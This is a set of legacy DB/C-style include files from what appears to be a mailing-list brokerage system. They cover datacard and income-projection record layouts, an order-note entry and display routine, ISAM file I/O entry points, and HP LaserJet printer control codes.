NDATFLAG FORM 1 non-zero once the filelist has been opened
NDATPATH FORM 1
.
. Master datacard record layout (600 bytes fixed). Position ranges in
. the comments below are documentation only; offsets derive from the
. LIST order and the DIM/FORM sizes.
DATVARS LIST
STATUS DIM 1 1-1 'W' FOR WITHDRAWN.
LSTNUM DIM 6 2-7 ZERO FILLED KEY.
.Following was increased from 4 bytes
OWNNUM DIM 6 8-13 OWNER NUMBER (KEY FOR NINOWN CMPOWN FILES)
.Following 2 were added
DATFUL DIM 6 14-19 FULFILLMENT NUMBER
DATMAN DIM 6 20-25 MANAGER
DATMLR DIM 6 26-31 MAILER THIS WOULD NEGATE THE NEED FOR NINXRF.DAT!!!!!!!!!!
.Possibly need fields for LCR routing and for Payment
...............
.10 Category fields have been moved to a subsidiary file
NLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
ELSTCDE DIM 1 33-33 EXCLUSIVE CODE (N, C or ).
. 'N' = NEW YORK, 'C'=CALIFORNIA, ' ' NONEXCLUSIVE
.START PATCH 6APR2005 REPLACED LOGIC
.COMMPER DIM 3 34-36 COMMISSION.
OLDCOMMPER DIM 3 34-36 COMMISSION. OBSOLETE FOR ALL NEWLY COMPILED PROGRAMS AS OF 4/6/2005
.END PATCH 6APR2005 REPLACED LOGIC
HOTLINE DIM 1 37-37 HOTLINE CODE (Y or N).
NEWDATE DIM 8 38-45 DATE CARD PUT UP CCYYMMDD FORMAT
REVDATE DIM 8 46-53 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD
PASSWORD DIM 10 54-63 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
MLSTNAME DIM 75 64-138 MASTER LIST NAME.
OLSTNAME DIM 35 139-173 ORDER LIST NAME.
.Addressing fields moved to subsidiary file
.Source Code fields moved to subsidiary file
.Arrangement fields moved to subsidiary file
.Selection fields moved to subsidiary file
.Mag Tape fields moved to subsidiary file
CLEANCDE DIM 4 174-177 CLEANED CODE (Cxxx).
CLNINFO DIM 38 178-215 CLEAN INFORMATION.
NETNAME DIM 4 216-219 NET NAME CODE (Nxxx).
NETINFO DIM 38 220-257 NET NAME INFORMATION.
DELCODE DIM 4 258-261 DELIVERY CODE (Dxxx).
SAMPLE DIM 4 262-265 SAMPLE CODE (Pxxx).
.Should following be put into a separate file?????
SEX DIM 15 266-280 SEX TEXT. OFF 1 BYTE
MIN DIM 11 281-291 MINIMUM TEXT.
UNIVERSE DIM 10 292-301 UNIVERSE QUANTITY.
DATPAY DIM 6 302-307 PAY-TO NUMBER.
NDATCONV DIM 1 308-308 CONVERSION BYTE
NDATEXCH DIM 1 309-309 1 = EITHER, 2 = EXCHANGE ONLY, 3 = RENTAL ONLY -- OBSOLETE!!! USING BYTE IN NINSEL INSTEAD
UNITDATA DIM 188 310-497
.Text Fields will be contained in subsidiary file
NDATWEB DIM 1 498-498 ALLOWED ON WEBSITE
NDATOFF DIM 1 499-499 1=OFFICE USE ONLY
NDATUPDDATE DIM 8 500-507 UPDATE DATE
NDATUPDINIT DIM 10 508-517 UPDATE INITS
NDATBUSY DIM 1 518-518
;begin patch 06July2004
NDatLUSAGE DIM 1 519-519 ; 'F' If we cannot sharelist usage info
.START PATCH 6APR2005 REPLACED LOGIC
.NDATFILL DIM 81 520-600 FILLER
COMMPER DIM 6 520-525 COMMISSION.
NDATFILL DIM 75 526-600 FILLER
.END PATCH 6APR2005 REPLACED LOGIC
;NDATFILL DIM 82 519-600 FILLER
;end patch 06July2004
.Eventually add following 2 fields:
. Verification Date - Data that List Owner last verified our datacard info
. Verification Schedule - Time frame when we start pestering List Owner about verifying our info.
LISTEND
<file_sep>/include/LSTIDD.INC
..............................................................................
.
. LSTIDD
. NIN Income PRojection data Descriptors
.
. FILE NAME : ListIproj.dat
. REC LENGTH: 138 FIXED
. INDEX KEY : (1) 1-13 (List #, project year, proj #)
.
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
LSTINAME INIT "LSTIProj.ISI|NINS1:502"
LSTIFILE IFILE KEYLEN=13,FIXED=138,NODUPLICATES
LSTIFLD DIM 13 key work area (list # + projection year + projection #)
LSTIFLAG FORM 1 non-zero once the file has been opened
. Income-projection record; position ranges are documentation only.
LSTIVARS LIST
LSTIList DIM 6 1-6 \
LSTIYear DIM 4 7-10 projection year } Key
LSTIproj dim 3 11-13 projection # /
LstIM1 FORM 9 14-22 projection for month 1 of year (may be fiscal see INCLdd)
LstIM2 FORM 9 23-31 projection for month 2 of year (may be fiscal see INCLdd)
LstIM3 FORM 9 32-40 projection for month 3 of year (may be fiscal see INCLdd)
LstIM4 FORM 9 41-49 projection for month 4 of year (may be fiscal see INCLdd)
LstIM5 FORM 9 50-58 projection for month 5 of year (may be fiscal see INCLdd)
LstIM6 FORM 9 59-67 projection for month 6 of year (may be fiscal see INCLdd)
LstIM7 FORM 9 68-76 projection for month 7 of year (may be fiscal see INCLdd)
LstIM8 FORM 9 77-85 projection for month 8 of year (may be fiscal see INCLdd)
LstIM9 FORM 9 86-94 projection for month 9 of year (may be fiscal see INCLdd)
LstIM10 FORM 9 95-103 projection for month 10 of year (may be fiscal see INCLdd)
LstIM11 FORM 9 104-112 projection for month 11 of year (may be fiscal see INCLdd)
LstIM12 FORM 9 113-121 projection for month 12 of year (may be fiscal see INCLdd)
LSTIDate Dim 17 122-138 date time projected - yyyymmddhhmmsssss
listend
<file_sep>/include/NONOCODE.INC
*...........................................................
*KEYNOTE - ADD A NEW ORDER NOTE.
* required = KEY (list rental number)
*...........................................................
.KEYNOTE - key in a new 6-line note for the list-rental number passed in KEY.
.  Stamps NDATE (Mm/Dd/Yy/CC), NTIME (HH/MN) and NINITS (from TYPINIT), then
.  collects NLINE1..NLINE6.  Per the SCAN tests in each NLINEn paragraph:
.    '*' (STAR)   - abandon the note and exit via EXNOTES
.    LBRAK        - back up to the previous line
.    RBRAK        - discard this entry and restore the line's prior text (SAVE)
.    empty entry  - (EOS) stop keying and go confirm at KEYNOTE1
.  NOTE(review): LBRAK/RBRAK are defined elsewhere - presumably '[' and ']';
.  confirm against the dd include.
KEYNOTE
TRAPCLR F3
TRAPCLR F4
display *savesw
.Build the date stamp: unpack MM/DD/YY from the clock, zero-fill, repack.
CLOCK DATE TO DATE
UNPACK DATE INTO Mm,STR1,Dd,STR1,Yy
REP ZFILL,Dd
REP ZFILL,Mm
PACK NDATE FROM Mm,Dd,Yy,CC
MOVE KEY TO NOTEKEY
.Build the time stamp HH:MN.
CLOCK TIME TO str8
UNPACK str8 INTO HH,STR1,MN
PACK NTIME FROM HH,MN
MOVE TYPINIT TO NINITS
CLEAR NLINE1
CLEAR NLINE2
CLEAR NLINE3
CLEAR NLINE4
CLEAR NLINE5
CLEAR NLINE6
.
.Paint the entry screen: header plus the six (empty) note lines.
DISPLAY *P1:16,*EF,*HON,"ENTER NOTE FOR LR:",*HOFF,*P1:17:
"LR : ",NOTEKEY:
*P1:18,NLINE1:
*P1:19,NLINE2:
*P1:20,NLINE3:
*P1:21,NLINE4:
*P1:22,NLINE5:
*P1:23,NLINE6
.Line 1: note there is no earlier line, so LBRAK exits just like '*'.
NLINE1 MOVE NLINE1 TO SAVE
KEYIN *P1:18,*RV,*+,NLINE1
SCAN STAR IN NLINE1
GOTO EXNOTES IF EQUAL
SCAN LBRAK IN NLINE1
GOTO EXNOTES IF EQUAL
SCAN RBRAK IN NLINE1
GOTO NLINE1X IF EQUAL
DISPLAY *P1:18,NLINE1
GOTO NLINE2
NLINE1X MOVE SAVE TO NLINE1
DISPLAY *P1:18,NLINE1
.
NLINE2 MOVE NLINE2 TO SAVE
KEYIN *P1:19,*RV,*+,NLINE2
SCAN STAR IN NLINE2
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE2
GOTO NLINE1 IF EQUAL
SCAN RBRAK IN NLINE2
GOTO NLINE2X IF EQUAL
DISPLAY *P1:19,NLINE2
GOTO NLINE3
NLINE2X MOVE SAVE TO NLINE2
DISPLAY *P1:19,NLINE2
.
NLINE3 MOVE NLINE3 TO SAVE
KEYIN *P1:20,*RV,*+,NLINE3
SCAN STAR IN NLINE3
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE3
GOTO NLINE2 IF EQUAL
SCAN RBRAK IN NLINE3
GOTO NLINE3X IF EQUAL
DISPLAY *P1:20,NLINE3
GOTO NLINE4
NLINE3X MOVE SAVE TO NLINE3
DISPLAY *P1:20,NLINE3
.
.NOTE(review): this paragraph tests IF EOS before IF EQUAL - the reverse of
.every other NLINEn paragraph. The outcome appears identical (an empty entry
.sets EOS, a found '*' sets EQUAL, and the two cannot both apply here), but
.confirm and consider matching the sibling order.
NLINE4 MOVE NLINE4 TO SAVE
KEYIN *P1:21,*RV,*+,NLINE4
SCAN STAR IN NLINE4
GOTO KEYNOTE1 IF EOS
GOTO EXNOTES IF EQUAL
SCAN LBRAK IN NLINE4
GOTO NLINE3 IF EQUAL
SCAN RBRAK IN NLINE4
GOTO NLINE4X IF EQUAL
DISPLAY *P1:21,NLINE4
GOTO NLINE5
NLINE4X MOVE SAVE TO NLINE4
DISPLAY *P1:21,NLINE4
.
NLINE5 MOVE NLINE5 TO SAVE
KEYIN *P1:22,*RV,*+,NLINE5
SCAN STAR IN NLINE5
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE5
GOTO NLINE4 IF EQUAL
SCAN RBRAK IN NLINE5
GOTO NLINE5X IF EQUAL
DISPLAY *P1:22,NLINE5
GOTO NLINE6
NLINE5X MOVE SAVE TO NLINE5
DISPLAY *P1:22,NLINE5
NLINE6 MOVE NLINE6 TO SAVE
KEYIN *P1:23,*RV,*+,NLINE6
SCAN STAR IN NLINE6
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE6
GOTO NLINE5 IF EQUAL
SCAN RBRAK IN NLINE6
GOTO NLINE6X IF EQUAL
DISPLAY *P1:23,NLINE6
GOTO KEYNOTE1
NLINE6X MOVE SAVE TO NLINE6
DISPLAY *P1:23,NLINE6
.
.Confirm and write: '*' abandons, 'N'(o) re-edits from line 1, anything else
.writes the note record keyed by KEY via NONOWRT.
KEYNOTE1 KEYIN *P1:24,*EL,*P20:24,"ALL OK ? ",*-,STR1;
CMATCH STAR IN STR1
GOTO EXNOTES IF EQUAL
CMATCH NO TO STR1
GOTO NLINE1 IF EQUAL
MOVE key TO NONOFLD
CALL NONOWRT
.EXNOTES - common exit: restore the saved screen switches and re-arm the
.F3 (display notes) / F4 (key note) hot keys.
EXNOTES
. display *scrnrst 1
display *restsw
TRAP keynote if F4
TRAP dissnote if F3
return
*...........................................................
*DISSNOTE - DISPLAY ANY ORDER NOTES.
* REQUIRED: KEY (LR NUMBER FROM ORDER OR INVOICE PROG.)
*...........................................................
.DISSNOTE - display any notes on file for the LR number passed in KEY.
.  Positions via NONOKEY; if the first record's NOTEKEY matches KEY, shows the
.  note header (date/time/initials) and the six text lines, then lets the
.  operator page: Enter = next note (NONOKS), 'P' = prior note (NONOKP),
.  '*' = quit.  Falls into NONOTE when no (more) records match.
DISSNOTE
. TRAPCLR F2
TRAPCLR F3
TRAPCLR F4
. display *scrnsave 1
display *savesw
TRAP DISSNOTE IF F3
MOVE KEY TO NONOFLD
CALL NONOKEY
MATCH KEY TO NOTEKEY *CORRECT RECORD?
GOTO NONOTE IF NOT EQUAL * NO
.Show one note: date is stored packed as MmDdYyCC, time as HHMN (see KEYNOTE).
DISNOTE1 UNPACK NDATE INTO Mm,dd,yy,CC
UNPACK NTIME INTO HH,MN
DISPLAY *P1:17,*EF:
"LR : ",NOTEKEY,*P14:17,"DATED : ",Mm,"/",Dd,"/",CC,Yy:
" ",HH,":",MN," By ",NINITS:
*P1:18,NLINE1:
*P1:19,NLINE2:
*P1:20,NLINE3:
*P1:21,NLINE4:
*P1:22,NLINE5:
*P1:23,NLINE6
KEYIN *P20:24,"Enter to continue, (P)rior Note",STR1,*P20:24,*EL;
CMATCH STAR IN STR1
GOTO NONOTE1 IF EQUAL
CMATCH "P" IN STR1
GOTO PRENOTE IF EQUAL
.Forward: key-sequential read; keep displaying while the key still matches.
CALL NONOKS
MATCH KEY TO NOTEKEY
GOTO DISNOTE1 IF EQUAL
GOTO NONOTE
.
.Backward: prior-record read via NONOKP; falls into NONOTE when exhausted.
PRENOTE CALL NONOKP
MATCH KEY TO NOTEKEY
GOTO DISNOTE1 IF EQUAL
.........
NONOTE DISPLAY *P20:23,*EL,"NO (MORE) NOTES FOUND :",*B,*W2:
*P20:23,*EL;
.Common exit: restore screen switches and re-arm the F3/F4 hot keys.
NONOTE1
. display *scrnrst 1
display *restsw
TRAP keynote if F4
TRAP dissnote if F3
return
.............................................................
<file_sep>/include/MDCMaindd.inc
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MAIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited - Note all these files come CSV from Min if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
.MIN datacard main file: 438-byte fixed records, reachable by ISAM (MinFILE)
.or AIM (MinFILE2). Per the header above, the raw feed arrives as CSV
.(MinSFile / MInCSVSTR hold the input side); non-hits are loaded into the
.indexed/aimdexed file for review.
MinNAME Init "MDC_Main.Isi|NINS1:502"
.MinFILE FILE Name="MDCMain.ISI|NINS1:502"
.
MinFlist Filelist
MinFILE IFILE fixed=438,Name="MDC_Main.Isi|NINS1:502"
MinFILE2 AFILE fixed=438,Name="MDC_Main.AAm|NINS1:502"
FilelistEnd
MinSFile File
.MinSFile File Name="MDCMain.csv|NINS1:502"
MinFLAG FORM 1
MinPATH FORM 1
.MinFLd: 6-byte ISAM key field; Minfld2: AIM key work area.
MinFLd Dim 6
Minfld2 Dim 53 .aim key
.MInCSVSTR: one raw CSV input line (up to 800 bytes).
MInCSVSTR DIM 800
.Fixed-record overlay of MDC_Main (438 bytes). Two layout FIXES applied:
.  NTNLT  was "106-105" (reversed/zero-length); 105 is the open byte between
.         BUCO (104-104) and DDTE8 (106-113).
.  UOSLOW was "292-300": overlapped UYESNO (286-292) and gave 9 bytes to an
.         8-byte Form 5.2; 293-300 matches every other 5.2 slot in the record.
MinMainVARS LIST .for ease I am using Min's names
DDCNOa Dim 6 1-6 datacard number .'a' cause dupe from MDC_MSC file
LSType Dim 1 7-7 card Type
DTTL Dim 50 8-57 Title .'a' cause dupe from MDC_MSC file
DMKEY Dim 5 58-62 Customer key
DMDCNO Dim 6 63-68 CHAR Rep Datacard # (is this the old #?)
DLOW Dim 5 69-73 List Owner Code
GNAMa DIM 25 74-98 List Owner Name .'a' because dupe from MDC090 file
DRET Dim 5 99-103 Tape REturn Code
BUCO Dim 1 104-104 Business / Consumer
NTNLT Dim 1 105-105 Nationality .FIX: was 106-105
DDTE8 dim 8 106-113 Datacard date CCYYMMDD
GPH1a Dim 11 114-124 Owner phone .'a' because dupe from MDC090 file
GPHFa Dim 11 125-135 Owner Fax .'a' because dupe from MDC090 file
DCNT Dim 25 136-160 Owner Contact
LOEML Dim 50 161-210 Owner Email
COMMMIn Form 3.2 211-216 Commission 3.2 .'Min - cause dupe
DDNU8 dim 8 217-224 next update
DDTR8 dim 8 225-232 Revised date
DDTC8 dim 8 233-240 Confirm date
DDDT8 dim 8 241-248 Update date
FNAM DIM 25 249-273 Return Tape Name
FemPer Form 3.2 274-279 percent female 3.2
MalPer Form 3.2 280-285 percent male 3.2
UYESNO Dim 7 286-292 UNit of sale yes/no
UOSLOW Form 5.2 293-300 Average UOS Low 5.2 .FIX: was 292-300
UOSHigh Form 5.2 301-308 Average UOS High 5.2
UOSAvG Form 5.2 309-316 Average UOS average 5.2
UNIV Dim 9 317-325 Universe
MinDoll form 5.2 326-333 Minimum dollar order 5.2
MinNME Dim 9 334-342 Minimum Names order
MinNet Dim 9 343-351 Minimum Net Names order
KEYCDE Form 5.2 352-359 Key code charges 5.2
NETNAMEa DIM 7 360-366 net name yes/no 'a' appended dupes our name
NMEPER form 3.2 367-372 Net Name percentage 3.2
RUNCHG form 5.2 373-380 running charges 5.2
RUNUNITS Dim 1 381-381 run units l/m
WBSTE Dim 50 382-431 LO Website
DDLTa Dim 1 432-432 "A"ctive "I"nactive .'a' cause dupe from MDC_MSC file
JLSTSTS DIm 1 433-433 List Status S,E,T,I,A
JPARENT Dim 5 434-438
LISTEND
.CSV-side overlay of the same 438-byte record (C-prefixed names). Same two
.layout FIXES as MinMainVARS: CNTNLT was "106-105" -> 105-105; CUOSLOW was
."292-300" (overlapping CUYESNO 286-292) -> 293-300.
.NOTE(review): several Dim widths in this overlay differ from their byte slots
.(e.g. Dim 7 in an 8-byte slot at 301-308); left as-is - confirm against the
.CSV loader before changing any widths.
MinMainVARS1 LIST .CSV FIle
CDDCNOa Dim 6 1-6 datacard number .'a' cause dupe from MDC_MSC file
CLSType Dim 1 7-7 card Type
CDTTL Dim 50 8-57 Title .'a' cause dupe from MDC_MSC file
CDMKEY Dim 5 58-62 Customer key
CDMDCNO Dim 6 63-68 CHAR Rep Datacard # (is this the old #?)
CDLOW Dim 5 69-73 List Owner Code
CGNAMa DIM 25 74-98 List Owner Name .'a' because dupe from MDC090 file
CDRET Dim 5 99-103 Tape REturn Code
CBUCO Dim 1 104-104 Business / Consumer
CNTNLT Dim 1 105-105 Nationality .FIX: was 106-105
CDDTE8 dim 8 106-113 Datacard date CCYYMMDD
CGPH1a Dim 11 114-124 Owner phone .'a' because dupe from MDC090 file
CGPHFa Dim 11 125-135 Owner Fax .'a' because dupe from MDC090 file
CDCNT Dim 25 136-160 Owner Contact
CLOEML Dim 50 161-210 Owner Email
CCOMMMIn dIM 5 211-216 Commission 3.2 .'Min - cause dupe
CDDNU8 dim 8 217-224 next update
CDDTR8 dim 8 225-232 Revised date
CDDTC8 dim 8 233-240 Confirm date
CDDDT8 dim 8 241-248 Update date
CFNAM DIM 25 249-273 Return Tape Name
CFemPer dIM 5 274-279 percent female 3.2
CMalPer dIM 5 280-285 percent male 3.2
CUYESNO Dim 7 286-292 UNit of sale yes/no
CUOSLOW dIM 7 293-300 Average UOS Low 5.2 .FIX: was 292-300
CUOSHigh DIM 7 301-308 Average UOS High 5.2
CUOSAvG DIM 7 309-316 Average UOS average 5.2
CUNIV Dim 9 317-325 Universe
CMinDoll dIM 7 326-333 Minimum dollar order 5.2
CMinNME Dim 9 334-342 Minimum Names order
CMinNet Dim 9 343-351 Minimum Net Names order
CKEYCDE dIM 7 352-359 Key code charges 5.2
CNETNAME DIM 7 360-366 net name yes/no
CNMEPER dIM 5 367-372 Net Name percentage 3.2
CRUNCHG dIM 7 373-380 running charges 5.2
CRUNUNITS Dim 1 381-381 run units l/m
CWBSTE Dim 50 382-431 LO Website
CDDLTa Dim 1 432-432 "A"ctive "I"nactive .'a' cause dupe from MDC_MSC file
CJLSTSTS DIm 1 433-433 List Status S,E,T,I,A
CJPARENT Dim 5 434-438
LISTEND
<file_sep>/include/cvtdd.inc
.cvtdd.inc
.created 17June98 DLH
.
.Minus-overpunch (MP) conversion work fields: MPCHANGE pairs each overpunch
.character with its digit ("}"=0, "J"=1 ... "R"=9); MPCHARS lists the valid
.overpunch characters for a negative value's last digit.
CVTFLD DIM 10 WORK FIELD USED FOR MP CONVERSION.
MPCHANGE INIT "}0J1K2L3M4N5O6P7Q8R9"
MPCHARS INIT "}JKLMNOPQR" VALID MINUS OVERPUNCH CHARACTERS
.NUM10: 10-digit numeric work field - presumably receives the converted value.
NUM10 FORM 10
<file_sep>/include/NWFXIO.INC
..............................................................................
.
. NWFXio INCLUSION
. NWFX Stats FILE DEFINITION
.
. FILE NAME : NWFXref
. REC LENGTH: FIXED
. INDEX KEY :
..............................................................................
.
..............................................................................
.
. ENTRY POINT : NWFXKEY
. REQUIRED : 'NWFXFLD'
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
.Each entry point lazy-opens the file: NWFXFLAG=1 (set by NWFXOPEN) branches
.past the CALL NWFXOPEN. FILEPI 1 protects each physical I/O.
NWFXKEY BRANCH NWFXFLAG TO NWFX1
CALL NWFXOPEN
NWFX1 FILEPI 1;NWFXFILE
READ NWFXFILE,NWFXFLD;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXTST
. REQUIRED : 'NWFXFLD' (banner previously said MKEY; code keys on NWFXFLD)
. RETURNED :
. DESCRIPTION : TEST KEY
. Reads into STR1 so the NWFXVARS record buffer is left untouched;
. caller tests the condition flags.
.
NWFXTST BRANCH NWFXFLAG TO NWFX2
CALL NWFXOPEN
NWFX2 FILEPI 1;NWFXFILE
READ NWFXFILE,NWFXFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NWFXKS
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : KEY SEQUENTIAL SPECIAL INSTRUCTION FILE READ
.
NWFXKS BRANCH NWFXFLAG TO NWFX3
CALL NWFXOPEN
NWFX3 FILEPI 1;NWFXFILE
READKS NWFXFILE;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXSEQ
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : SEQUENTIAL SPECIAL INSTRUCTION FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NWFXSEQ BRANCH NWFXFLAG TO NWFX4
CALL NWFXOPEN
NWFX4 FILEPI 1;NWFXFILE
READ NWFXFILE,SEQ;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
.NWFXWRT - exact ISAM key insert of NWFXVARS under key NWFXFLD.
.FIX: was "BRANCH NWFXFLAG OF NWFX5"; changed OF to TO so this entry point
.matches the other six in this include. Effect is the same here: flag=1
.branches to NWFX5, flag=0 falls through and opens the file first.
NWFXWRT BRANCH NWFXFLAG TO NWFX5
CALL NWFXOPEN
NWFX5 FILEPI 1;NWFXFILE
WRITE NWFXFILE,NWFXFLD;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE SPECIAL INSTRUCTION FILE
.
.NWFXUPD - rewrite the record fetched by the caller's previous keyed read.
NWFXUPD BRANCH NWFXFLAG TO NWFX6
CALL NWFXOPEN
NWFX6 FILEPI 1;NWFXFILE
UPDATE NWFXFILE;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXDEL
. REQUIRED : 'NWFXFLD' (banner previously said MKEY; code keys on NWFXFLD)
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NWFXDEL BRANCH NWFXFLAG TO NWFX7
CALL NWFXOPEN
NWFX7 FILEPI 1;NWFXFILE
DELETE NWFXFILE,NWFXFLD
RETURN
..............................................................................
.
. ENTRY POINT : NWFXOPEN
. REQUIRED : 'NWFXFLAG'
. RETURNED : 'NWFXFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN SPECIAL INSTRUCTION FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
.On success sets NWFXFLAG=1 so later entry points skip the OPEN.
NWFXOPEN TRAP NWFXGONE IF IO
OPEN NWFXFILE,NWFXNAME
TRAPCLR IO
MOVE C1 TO NWFXFLAG
RETURN
.
.IO-trap target: hand the missing file name to the common FILEGONE handler
.(per the banner above, FILEGONE reports the error and aborts).
NWFXGONE MOVE NWFXNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
.END OF INCLUDE
<file_sep>/include/ncltdd.inc
******************************************************
* NCLTDD INCLUSION
* CONSULTANT/CLIENT CROSS REFERENCE FILE (FOR WEBSITE PURPOSES)
* NOTE: THIS DD MAY BE TEMPORARY!!!
. ....................................................
* ****************************************************
* NAMES IN THE NEWS CONSULTANT/CLIENT CROSS REFERENCE FILE.
* ****************************************************
. release 1.0 2005 December 12 ASH Original Release
.
. FILE: NINCLT
. LENGTH: 50
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-14 NCLTCONSULT + NCLTCLIENT + NCLTNUM
.AIMDEX KEY: 1-6 NCLTCONSULT
. 7-12 NCLTCLIENT
......................................................
.Consultant/client cross-reference file definitions (see header above).
.NOTE(review): the header documents the ISAM key as bytes 1-14
.(NCLTCONSULT+NCLTCLIENT+NCLTNUM) but KEYLEN=9 here, and the key work fields
.NCLTFLD1/NCLTFLD2 are DIM 9 - one of these looks wrong; confirm against the
.live index before rebuilding.
NCLTNAME INIT "NINCLT"
NCLTFLIST FILELIST
NCLTFILE IFILE KEYLEN=9,FIXED=50,Name="NINCLT.isi|NINS1:502"
NCLTFLE2 AFILE FIXED=50,Name="NINCLT.aam|NINS1:502"
FILELISTEND
NCLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
.NCLTFLD: AIM key work area; NCLTFLD1/2: per-index key work fields.
NCLTFLD DIM 145
NCLTFLD1 DIM 9
NCLTFLD2 DIM 9
NCLTFLAG FORM 1
NCLTPATH FORM 1
.
NCLTVARS LIST
NCLTCONSULT DIM 6 1-6 Consultant Number (ISAM/AAM)
NCLTCLIENT DIM 6 7-12 Client Number (ISAM/AAM)
NCLTNUM DIM 2 13-14 Unique Number (Allow up to 99 new entries) (ISAM)
NCLTSDATE DIM 8 15-22 Relationship Start Date
NCLTEDATE DIM 8 23-30 Relationship End Date
NCLTTYPE DIM 1 31-31 Type of Consultant: " "=Regular, "1"=Consultant may not have their name on Orders, therefore allow them to view Orders for their Clients where the Broker field is blank (this can be dangerous!)
NCLTFILLER DIM 19 32-50 Filler
LISTEND
<file_sep>/include/P4450.INC
.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
. HPLJII
. Control codes for the
. HP Laserjet Series II printer.
.
. Software is custom written and Fonts for the HP Laserjet II
. have been custom tailored for American Cyanamid by
.
. C.H.E.S. System Services 01-15-88
.
.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.
. Control characters for choosing fonts of different point sizes
.
HP06PT INIT 033,"(6X" 06 point
HP10PT INIT 033,"(0X" 10 point
HP11PT INIT 033,"(1X" 11 point
HP12PT INIT 033,"(2X" 12 point bold
HP14PT INIT 033,"(4X" 14 point bold
.
HPCOUR INIT 033,"(s3T" Courier typeface
HPLINE INIT 033,"(s0T" Line Printer typeface
HPHELV INIT 033,"(s4T" Helvetica typeface
HPTMSRMN INIT 033,"(s5T" Times Roman typeface
HPPRES INIT 033,"(s8T" Prestige Elite typeface
HPGOTHIC INIT 033,"(s6T" Gothic typeface
.
. Control characters for horizontal tab position from the left margin
. (PCL "ESC *p#X" absolute moves; units appear to be 300-per-inch dots).
. NOTE(review): several dot counts do not equal inches x 300 (e.g. 0.25in ->
. 100 rather than 75); they look hand-tuned to this form - confirm before
. "correcting" any value.
.
HPT000 INIT 033,"*p000X" 0.00 inches from left margin
HPT025 INIT 033,"*p100X" 0.25 inches from left margin
HPT150 INIT 033,"*p450X" 1.50 inches from left margin
HPT175 INIT 033,"*p500X" 1.75 inches from left margin
HPT200 INIT 033,"*p600X" 2.00 inches from left margin
HPT225 INIT 033,"*p700X" 2.25 inches from left margin
HPT250 INIT 033,"*p750X" 2.50 inches from left margin
HPT300 INIT 033,"*p900X" 3.00 inches from left margin
HPT325 INIT 033,"*p950X" 3.25 inches from left margin
HPT350 INIT 033,"*p1050X" 3.50 inches from left margin
HPT375 INIT 033,"*p1100X" 3.75 inches from left margin
HPT400 INIT 033,"*p1150X" 4.00 inches from left margin
HPT450 INIT 033,"*p1300X" 4.50 inches from left margin
HPT475 INIT 033,"*p1425X" 4.75 inches from left margin
HPT525 INIT 033,"*p1600X" 5.25 inches from left margin
HPT550 INIT 033,"*p1700X" 5.50 inches from left margin
HPT575 INIT 033,"*p1725X" 5.75 inches from left margin
HPT650 INIT 033,"*p2000X" 6.50 inches from left margin
.
. Control characters for vertical tab position
.
HPVU01 INIT 033,"&a-1R" 1 Line up from current position
HPVU02 INIT 033,"&a-2R" 2 Lines up from current position
.
.
. Control characters for drawing a line
. LN1 = Across page, LN2 = Right half of page
.
HPLN1 INIT 033,"*c2400a10b0p",033,"*p+60Y"
HPLN2 INIT 033,"*p-22Y",033,"*p600X",033,"*c1800a02b0p"
.
. e.w. lake beginning to wreak havoc...
.
HPRESET INIT 033,"E"
.
HPBON INIT 033,"(s3B" Bold on
HPBOFF INIT 033,"(s0B" Bold off
.
HPUNON INIT 033,"&dD" Underline on
HPUNOFF INIT 033,"&d@" Underline off
.
HPLIN6 INIT 033,"&l6D" 6 lines per inch
HPLIN8 INIT 033,"&l8D" 8
.
. left right top bottom
HPLETTER INIT 033,"&a13L",033,"&a72M",033,"&l13E",033,"&l60F"
HPPORT INIT 033,033,"H,P,FR1;"
HPLAND INIT 033,033,"H,L,FR5;"
.
.
. symbol set
. / spacing
. / / pitch
. / / / point
. / / / / style
. / / / / / stroke weight
. | | | | | / typeface
. | | | | | | /
.
HPGOTH12 INIT 033,"(8U",033,"(s0p12.00h12.00v0s-2b6T"
